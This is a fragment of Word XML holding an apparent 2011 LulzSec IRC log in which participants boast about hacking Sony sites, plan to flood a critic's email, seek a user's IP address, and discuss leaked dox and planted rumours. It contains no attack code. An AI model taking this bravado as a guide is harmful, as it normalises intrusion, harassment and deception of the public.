          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:40:06 sabu what?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:40:11 storm pft Jun 04 14:40:12 storm wtf Jun 04 14:40:17 storm JackSparrow's script Jun 04 14:40:17 storm is Jun 04 14:40:18 storm shit Jun 04 14:40:25 &lt;io&gt; lulz Jun 04 14:40:27 neuron lol Jun 04 14:40:30 storm serious Jun 04 14:40:32 storm absolute shit Jun 04 14:40:39 neuron Bwhaha he kicked a mod awesome Jun 04 14:40:47 storm i cant get in cause kayla set +R Jun 04 14:41:06 &lt;io&gt; try now Jun 04 14:41:15 &lt;io&gt; ugh Jun 04 14:41:18 &lt;io&gt; clones back.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:41:28 sabu sigh Jun 04 14:41:43 storm kline them Jun 04 14:42:08 joepie91 sabuthey disrupt national nazi parties Jun 04 14:42:08 joepie91 sabuook at how they fight the ns88 Jun 04 14:42:08 joepie91 tflowwhat did they say?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:42:08 joepie91 tflowlolwow Jun 04 14:42:08 joepie91 sabudude Jun 04 14:42:08 joepie91 sabuthey straight up fuck them nazis up hahaha Jun 04 14:43:17 sabu yeah joepie Jun 04 14:43:18 lol i didn't set +R :s Jun 04 14:43:20 sabu that guy Jun 04 14:43:25 storm get me ops back XD Jun 04 14:43:26 sabu part of anti-ns88 movement Jun 04 14:43:34 sabu they got a big anarchy group Jun 04 14:43:37 sabu that fights nazis Jun 04 14:43:56 joepie91 do they have a name?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:44:00 joepie91 like Jun 04 14:44:01 joepie91 group name Jun 04 14:44:15 joepie91 I might be able to ask around a bit and figure out if anyone knows anyting about them and/or their reputation Jun 04 14:44:35 &lt;io&gt; &lt;ryan&gt; /msg botserv badwords #lulzsec add irc.hardchats.com Jun 04 14:44:35 &lt;io&gt; &gt;botserv&lt; badwords #lulzsec add irc.hardchats.com Jun 04 14:44:35 &lt;io&gt; -BotServ- irc.hardchats.com added to #lulzsec bad words list.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:44:35 &lt;io&gt; &lt;buccaneer&gt; done, thx Jun 04 14:44:35 &lt;io&gt; &lt;ryan&gt; i turned dontkickops on too so voodoo wont get kicked again Jun 04 14:45:33 storm thanks Jun 04 14:45:36 storm :D Jun 04 14:45:47 sabu ryan doesnt know any of you are involved Jun 04 14:45:48 storm it won't work till I'm opped though &gt;;x Jun 04 14:46:09 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 14:46:32 * tflow (bottle_of_@HA-r12.0jd.4c0nch.IP) has joined #pure- elite Jun 04 14:47:18 &lt;io&gt; Sabu, didn't talk to him any further and won't. Jun 04 14:47:54 storm we need a v6 server Jun 04 14:47:57 storm fosho Jun 04 14:48:20 storm | WooF (h@LulzCo-552A80F8.hsd1.ma.comcast.net) (Network) Jun 04 14:48:25 storm someone gimme his ip Jun 04 14:48:26 storm lmao Jun 04 14:48:33 storm ill piss him off by taking his nick Jun 04 14:53:44 * Topiary (t@HA-iag.hpg.3uomjh.IP) has joined #pure-elite Jun 04 14:53:55 neuron brb Jun 04 14:53:57 * neuron has quit (Quit: leaving) Jun 04 14:56:45 storm anyone?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:57:41 joepie91 eh Jun 04 14:57:44 joepie91 how should we give his IP?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:58:32 storm opers Jun 04 14:58:36 storm should see ips Jun 04 14:58:50 * neuron (neuron@HA-cm6.345.a84vd3.IP) has joined #pure- elite Jun 04 14:58:59 neuron back o/ Jun 04 15:01:13 joepie91 who... are an oper on ED IRC?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 15:03:17 joepie91 also, Topiary: http://twitter.com/#!/AnotherBrony/status/77049413146648577 Jun 04 15:10:00 lol please guys, dont open anything these people on #lulzsec give you, more than likely it has a 0day in it to own you Jun 04 15:10:08 lol these people are giving you things for a reason Jun 04 15:10:58 neuron Aye :p like that rar i got containing.. a .xls , .ppt, .doc, pdf...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 15:11:00 neuron XD Jun 04 15:11:13 neuron all useless info Jun 04 15:11:35 storm lol.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 15:11:59 lol neuron did you open it on a VM?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 15:12:36 storm gtg guys Jun 04 15:12:38 storm ill bbl Jun 04 15:12:42 lol bye storm &lt;3 :) Jun 04 15:12:43 storm someone gimme woofs ip Jun 04 15:12:43 joepie91 http://jadedsecurity.net/2011/06/04/who-is-to- blame-for-the-success-of-the-latest-round-of-attacks/ Jun 04 15:12:45 storm &lt;3 :D Jun 04 15:13:09 joepie91 also, best way is still to have a completely isolated machine Jun 04 15:13:17 joepie91 with the actual network cable unplugged Jun 04 15:13:23 joepie91 to open your shit on Jun 04 15:13:28 joepie91 can't break out of a physical machine :D Jun 04 15:14:02 neuron vm :P cause you can nuke it Jun 04 15:18:09 joepie91 vm inside physical machine Jun 04 15:18:16 joepie91 reinstall OS on physical machine Jun 04 15:18:24 joepie91 to "nuke" it :P Jun 04 15:18:33 joepie91 anyhow, read that article Jun 04 15:22:43 joepie91 "Slashdot has so many gurus meditating, the entire damn datacenter had better be levitating a mile off the ground." Jun 04 15:33:40 neuron \o/ we have a $10,000 Bounty http://www.youtube.com/watch?v=RcsJW7Ah-Ho Jun 04 15:34:00 neuron Apperently im a piece of crap... XD Jun 04 15:34:19 pwnsauce :D Jun 04 15:34:22 pwnsauce LOL Jun 04 15:34:29 neuron watch it lol Jun 04 15:34:34 neuron we should flood his inbox for the lulz Jun 04 15:36:03 pwnsauce will do Jun 04 15:36:09 pwnsauce once I free soe band width Jun 04 15:36:13 neuron :D Jun 04 15:36:14 pwnsauce you know what my connections like Jun 04 15:36:21 neuron lol you can use my shell :P Jun 04 15:36:51 joepie91 lol he mad Jun 04 15:36:58 joepie91 he so mad Jun 04 15:37:18 neuron Sabu: Watch that video Jun 04 15:37:47 sabu I did Jun 04 15:38:22 pwnsauce lulz Jun 04 15:38:56 joepie91 lol just wow Jun 04 15:39:09 joepie91 sony fanboys putting a bounty on lulzsec... Jun 04 15:39:11 neuron lol How many voice interview was Topiary involved in :p every time i watch a new interview its tops voice haha Jun 04 15:39:57 Topiary blame Westboro Batshit Church Jun 04 15:40:23 neuron http://www.youtube.com/watch?v=0UmdcNqZmw8 &lt;&lt; Jun 04 15:42:12 joepie91 did kevin mitnick Jun 04 15:42:13 joepie91 just tweet Jun 04 15:42:15 Topiary my shit was about to get raped so hard via DDoS and I didn't want to spend 3 minutes getting back in, so I quickly switched VPNs Jun 04 15:42:16 joepie91 the dox Jun 04 15:42:18 Topiary @ that interview Jun 04 15:42:24 tflow yes Jun 04 15:42:27 tflow he's a tool Jun 04 15:42:27 joepie91 lol.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 15:42:43 tflow i can't believe they would believe an fbi-informant would hack the bi Jun 04 15:42:45 tflow fbi* Jun 04 15:42:47 neuron lol Topiary how many interviews did you do :P i like to hear them question you Jun 04 15:42:59 Topiary just that one and the other one really Jun 04 15:43:12 joepie91 also what is lulzsec.net Jun 04 15:43:51 tflow no idea, it looks like ryan's doing Jun 04 15:43:53 * neuron claps Jun 04 15:44:09 tflow he also registered lulzsec.org Jun 04 15:45:52 neuron lol this is the first time i saw the leaked dox Jun 04 15:46:22 Topiary kayla and I wrote it Jun 04 15:46:24 Topiary pretty good huh Jun 04 15:46:57 neuron Yeah i like them. Kevin mitnick retwitt makes it even better Jun 04 15:47:28 &lt;io&gt; oh they're from us? thought someone was really that moronic heh Jun 04 15:48:00 * joepie91 checks whois for lulzsec.org/net Jun 04 15:53:18 tflow but yeah Jun 04 15:53:26 tflow no way i#m trusting ryan with any domain Jun 04 15:53:31 tflow after what he did to anonops Jun 04 15:53:35 tflow domains Jun 04 15:53:35 pwnsauce aye Jun 04 15:56:09 neuron what did he do? *i was never in the anonops loop* Jun 04 15:56:28 joepie91 jacked anonops domains Jun 04 15:56:32 joepie91 ddosed the network Jun 04 15:56:36 joepie91 basically hostile takeover Jun 04 15:56:41 joepie91 followed by trying to fuck it up Jun 04 15:56:53 joepie91 but on another note, I should write a fucking script that allows everyone "10 PM credits a day" Jun 04 15:56:57 joepie91 every time you send me a PM you lose one Jun 04 15:57:00 joepie91 after 10 PMs you get ignored Jun 04 15:57:07 neuron lmfao Jun 04 15:57:11 joepie91 maybe that fixes the people typing 1 word per line in PM Jun 04 15:57:22 joepie91 and people that start complete random offtopic conversations while uploading a press release Jun 04 15:57:24 joepie91 and I'm like Jun 04 15:57:25 joepie91 DUDE Jun 04 15:57:27 joepie91 SHUT UP Jun 04 15:57:30 joepie91 I AM TRYING TO GET WORK DONE Jun 04 15:57:44 joepie91 like, just ask your question or state your problem, wait for me to answer, cut all the bullshit and get to the point Jun 04 15:57:45 joepie91 -_- Jun 04 15:58:58 tflow https://support.cloudflare.com/discussions/general- chit-chat/37-cloudflare-protect-bad-guys-websites Jun 04 15:59:02 tflow check that out Jun 04 15:59:02 tflow rofl Jun 04 16:00:06 neuron thats awesome Jun 04 16:00:33 tflow 'CloudFlare does not censor content online, but we do comply with law enforcement agencies as appropriate.' Jun 04 16:00:40 tflow i guess that means handing over ips and stuff Jun 04 16:00:44 tflow i'm ok with that Jun 04 16:01:00 tflow they can arrest some random brazilian guy with a unsecured router Jun 04 16:01:05 tflow an* Jun 04 16:01:06 &lt;io&gt; :D Jun 04 16:01:18 pwnsauce :D Jun 04 16:01:21 pwnsauce LOL :D Jun 04 16:01:58 sabu lolol Jun 04 16:02:46 joepie91 2 Posted by KillerKoala on June 03, 2011 @ 07:22 PM Jun 04 16:02:47 joepie91 You should contact CloudFlare's support team and complain.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:02:48 joepie91 ..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:02:58 * joepie91 gets annoyed by moralfags who are too lazy and/or not have balls to do something themselves Jun 04 16:04:58 joepie91 also, lol Jun 04 16:05:00 joepie91 cloudflare is really like Jun 04 16:05:04 joepie91 "ye well, idgaf" Jun 04 16:06:24 tflow http://attrition.org/security/rants/sony_aka_sownage.html Jun 04 16:06:24 tflow http://attrition.org/security/rants/sony_aka_sownage.html Jun 04 16:06:25 tflow http://attrition.org/security/rants/sony_aka_sownage.html Jun 04 16:07:15 pwnsauce attrition &lt;3 Jun 04 16:07:27 joepie91 my god. how can people fail to do something as fucking simple as uploading a press release Jun 04 16:07:28 joepie91 like Jun 04 16:07:30 joepie91 there is a few people Jun 04 16:07:35 joepie91 that magically have some sort of problem Jun 04 16:07:37 joepie91 when adding PRs Jun 04 16:07:39 joepie91 EVERY time Jun 04 16:07:56 &lt;io&gt; "If anyone... ANYONE at all uses the term "advanced persistent threat" in describing the attacks on Sony, please hit them very hard before disregarding them as ignorant charlatans hell-bent on serving their own interests." Jun 04 16:07:57 &lt;io&gt; hahaha Jun 04 16:08:11 joepie91 also, http://pastebin.com/aXLkmNmR Jun 04 16:08:22 neuron Hey guys don't you like our recent advanced persisten attacks on sony ;D Jun 04 16:08:53 tflow yeah, i saw joepie91, we rt'd it Jun 04 16:09:02 tflow "I was Bored and I play the game of the year : "hacker vs Sony"" Jun 04 16:09:04 tflow hilarious Jun 04 16:10:49 &lt;io&gt; yah haha Jun 04 16:11:17 &lt;io&gt; by the timeline score is 2:2 between idahc and lulzsec :p Jun 04 16:11:18 tflow certainly is the best game i've played this year Jun 04 16:12:30 joepie91 lol Jun 04 16:12:32 joepie91 ya Jun 04 16:12:36 Topiary game of the year all years Jun 04 16:12:49 lol nah we done 3 or 4 :D Jun 04 16:12:58 joepie91 like Jun 04 16:12:59 joepie91 honestly Jun 04 16:13:00 &lt;io&gt; yah iu thought here was some stuff missing Jun 04 16:13:03 joepie91 it would be best for sony Jun 04 16:13:03 &lt;io&gt; benelux Jun 04 16:13:03 lol sonypics, sonyjp, sonybmg and another Jun 04 16:13:06 joepie91 to just ditch the entire company Jun 04 16:13:10 joepie91 all their web services Jun 04 16:13:12 joepie91 everything Jun 04 16:13:16 joepie91 and just start over from scratch Jun 04 16:13:17 joepie91 lol Jun 04 16:13:19 &lt;io&gt; working on that, sir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:13:31 &lt;io&gt; maybe we could do that for them?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:13:37 joepie91 lolol Jun 04 16:15:34 * storm has quit (Ping timeout: 121 seconds) Jun 04 16:19:47 joepie91 my god Jun 04 16:19:52 joepie91 I'm going to fucking disallow JPG uploads Jun 04 16:19:53 joepie91 on anonnews Jun 04 16:19:59 joepie91 "yeah but I thought JPG was the best format!" Jun 04 16:20:00 neuron lol why Jun 04 16:20:04 joepie91 because Jun 04 16:20:05 joepie91 all these PRs Jun 04 16:20:07 joepie91 are text Jun 04 16:20:08 joepie91 or vector Jun 04 16:20:13 joepie91 and are fucking full of artifacts Jun 04 16:20:17 joepie91 every time someone submits a jpg Jun 04 16:20:21 trollpoll nice recopilation of sony hacks Jun 04 16:20:27 trollpoll btw hi Jun 04 16:20:36 joepie91 like, honestly Jun 04 16:20:38 joepie91 just fucking use PNG Jun 04 16:20:44 joepie91 it's incredibly small for text and vector Jun 04 16:20:47 joepie91 with no quality loss Jun 04 16:20:49 joepie91 also, hai trollpoll Jun 04 16:21:29 trollpoll lol sonypics, sonyjp, sonybmg and another Jun 04 16:21:35 trollpoll that another is like voldermort Jun 04 16:21:41 trollpoll noone wants to name...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:21:44 joepie91 sony* Jun 04 16:22:55 trollpoll so.. whats up sirs?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:23:23 joepie91 lulz Jun 04 16:23:26 joepie91 mainly Jun 04 16:23:28 neuron lol Jun 04 16:23:36 neuron trollpoll: we have a 10k bounty on our heads :) Jun 04 16:23:51 trollpoll wtf?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:24:09 &lt;io&gt; once we hit 10 million, i consider turning myself in. Jun 04 16:24:28 trollpoll who?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:24:31 trollpoll fbi?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:24:34 &lt;io&gt; some sony fanboy Jun 04 16:24:37 &lt;io&gt; nah lol Jun 04 16:24:39 trollpoll bah Jun 04 16:24:42 &lt;io&gt; trollZ obviously Jun 04 16:24:49 neuron http://www.youtube.com/watch?v=RcsJW7Ah-Ho Jun 04 16:24:54 joepie91 lesigh Jun 04 16:24:56 joepie91 http://blitz.uservoice.com/forums/107109- feedback/suggestions/1897759-play-nice-with-cloudflare Jun 04 16:24:59 * storm (foolish@HA-n2d.mb1.tkrenp.IP) has joined #pure- elite Jun 04 16:25:10 neuron lol i say we flood his email with dongs and nyan nyan cat Jun 04 16:25:10 joepie91 in the category of stupid proposals of the day Jun 04 16:25:10 trollpoll i use links2 ... i can see youtube now Jun 04 16:25:18 * pwnsauce (pwnsauce@HA-l80.7te.pn6gun.IP) has left #pure- elite Jun 04 16:25:21 joepie91 blitz Jun 04 16:25:22 joepie91 pbreit, All requests made by blitz have the X- Powered-By: blitz.io header. Maybe you can talk to the CloudFlare team to see if they use this to ignore the hits and not throttle. You can read more about our automatic headers at: http://docs.blitz.io/sprinting/basics Jun 04 16:25:53 trollpoll hacking from an amd of more or less 10 years... Jun 04 16:27:52 joepie91 trollpoll Jun 04 16:27:56 joepie91 specs?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:28:32 * pwnsauce (pwnsauce@HA-l80.7te.pn6gun.IP) has joined #pure- elite Jun 04 16:30:44 trollpoll shit, im trying to copy paste an d i can... lol Jun 04 16:30:44 trollpoll xDDD Jun 04 16:30:57 pwnsauce LOL Jun 04 16:31:05 trollpoll AMD-K6(tm)-III Processor Jun 04 16:31:13 trollpoll Mhz 551 Jun 04 16:31:20 pwnsauce I have to hack into my own server cos my sister changed the root password again Jun 04 16:31:51 trollpoll lol Jun 04 16:32:06 trollpoll i won this laptop in a hacking challenge Jun 04 16:32:08 neuron physical access makes it much easier Jun 04 16:32:18 trollpoll well... the rest of the ppl doesnt consider a hacking challenge Jun 04 16:32:27 pwnsauce I have physical, but I want to remote it Jun 04 16:32:28 trollpoll they just challenge...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:32:33 neuron should we push some of our funds to buy trollpoll a new laptop?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:32:39 trollpoll lol Jun 04 16:32:47 trollpoll i have 3 Jun 04 16:32:59 pwnsauce :D Jun 04 16:33:04 trollpoll but, all in use XDD Jun 04 16:33:18 trollpoll so, i have tor, i have python...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:33:24 trollpoll i can use links2 with tor...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:33:28 trollpoll what more?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:33:41 pwnsauce :D Jun 04 16:35:31 neuron lol Jun 04 16:35:33 neuron trollpoll: vpn man :( Jun 04 16:35:51 trollpoll sure Jun 04 16:36:04 neuron what are we going to call it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:36:27 storm back Jun 04 16:36:30 trollpoll i have to improve my skills on anonymate :) Jun 04 16:36:42 joepie91 just stresstested a server of mine Jun 04 16:36:43 joepie91 it did not liek Jun 04 16:36:44 joepie91 :( Jun 04 16:36:55 neuron trollpoll: do you want a vpn? :P im sure we can get you one Jun 04 16:37:10 joepie91 also Jun 04 16:37:11 trollpoll it will be nice Jun 04 16:37:17 joepie91 I have a pentium 3 laptop Jun 04 16:37:20 joepie91 it has like 1,1GhZ though Jun 04 16:37:22 trollpoll lol Jun 04 16:37:40 trollpoll can you run x on it? :D Jun 04 16:37:56 neuron Sabu: do you have a spare vpn :E trollpoll has none Jun 04 16:38:40 joepie91 trollpoll: I actually run Puppy Linux with IceWM Jun 04 16:38:42 joepie91 it runs very well Jun 04 16:38:44 joepie91 I can Skype Jun 04 16:38:49 joepie91 use Iron (aka Chromium) Jun 04 16:38:52 joepie91 with Flash Jun 04 16:38:53 trollpoll very nice Jun 04 16:38:55 joepie91 including Tinychat Jun 04 16:38:56 joepie91 I have Geany Jun 04 16:39:03 joepie91 a local Hiawatha/PHP/MariaDB stack Jun 04 16:39:10 joepie91 PMusic as media player Jun 04 16:39:15 joepie91 Nettalk as IRC client Jun 04 16:39:22 joepie91 (through WINE) Jun 04 16:39:32 trollpoll wow Jun 04 16:39:32 sabu trollpoll I will give you vpn Jun 04 16:39:38 joepie91 hell, I can even have audio/video conversations with Skype with almost no lagginess Jun 04 16:39:39 joepie91 :P Jun 04 16:39:43 * joepie91 &lt;3 Puppy Linux Jun 04 16:39:49 trollpoll did you tried to use iceweasel?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:39:59 joepie91 lol Jun 04 16:40:01 joepie91 firefox raped it Jun 04 16:40:03 trollpoll is a disaster Jun 04 16:40:07 trollpoll xDD Jun 04 16:40:13 joepie91 there's a reason I use chromium-based browsers Jun 04 16:40:13 joepie91 lol Jun 04 16:40:23 trollpoll thank you Sabu Jun 04 16:40:23 joepie91 Firefox like, lagged it to death with 3 tabs open Jun 04 16:40:29 joepie91 in Iron I often have like 25 tabs open Jun 04 16:40:38 joepie91 and I never get above 80% of my RAM Jun 04 16:40:42 trollpoll 3 tabs... you are privileged xDDD Jun 04 16:40:46 joepie91 total RAM in that box is 384MB RAM Jun 04 16:40:59 trollpoll if i start iceweasel, i cant do anything else Jun 04 16:41:33 joepie91 so basically I am using at most 80% of my 384MB RAM Jun 04 16:41:33 joepie91 and that includes the OS itself, Iron/Chromium + Tinychat (flash video chat), Skype, Geany, local webserver stack with php/mysql, Streaming music Jun 04 16:41:40 joepie91 beat that. :D Jun 04 16:41:47 trollpoll thats the ram for!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:41:54 joepie91 my CPU is the bottleneck Jun 04 16:41:57 joepie91 Flash tends to fuck it up Jun 04 16:42:01 joepie91 and go 28.5 load avg Jun 04 16:42:02 trollpoll if you dont use, you ar wasting!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:42:03 joepie91 out of nowhere Jun 04 16:42:09 joepie91 I'm not even kidding Jun 04 16:42:13 joepie91 it literally goes up to 28.5 Jun 04 16:45:08 joepie91 so wait Jun 04 16:45:20 joepie91 you guys are claiming that lulzsec is a CIA op Jun 04 16:45:30 trollpoll sure Jun 04 16:45:31 joepie91 that Anonymous is working to uncover LulzSec Jun 04 16:45:35 trollpoll dont you think is cool?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:45:36 joepie91 that Adrian Lamo is at the head of it all Jun 04 16:45:41 joepie91 and people actually BELIEVE this shit?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:45:46 trollpoll hahahaha Jun 04 16:45:50 joepie91 like, seriously Jun 04 16:45:51 joepie91 :| Jun 04 16:45:55 trollpoll counter information is usually better than information Jun 04 16:46:06 trollpoll as i was talking before Jun 04 16:46:20 trollpoll make the ppl think lulzsec is CIA group Jun 04 16:46:24 trollpoll makes sense even for me Jun 04 16:46:52 Topiary we're not claiming anything joepie, we're letting other people think things Jun 04 16:47:02 Topiary they are stupid Jun 04 16:47:06 Topiary real stupid Jun 04 16:47:11 trollpoll btw, what channels are u using?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:47:17 trollpoll 4chan? forums? chats?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
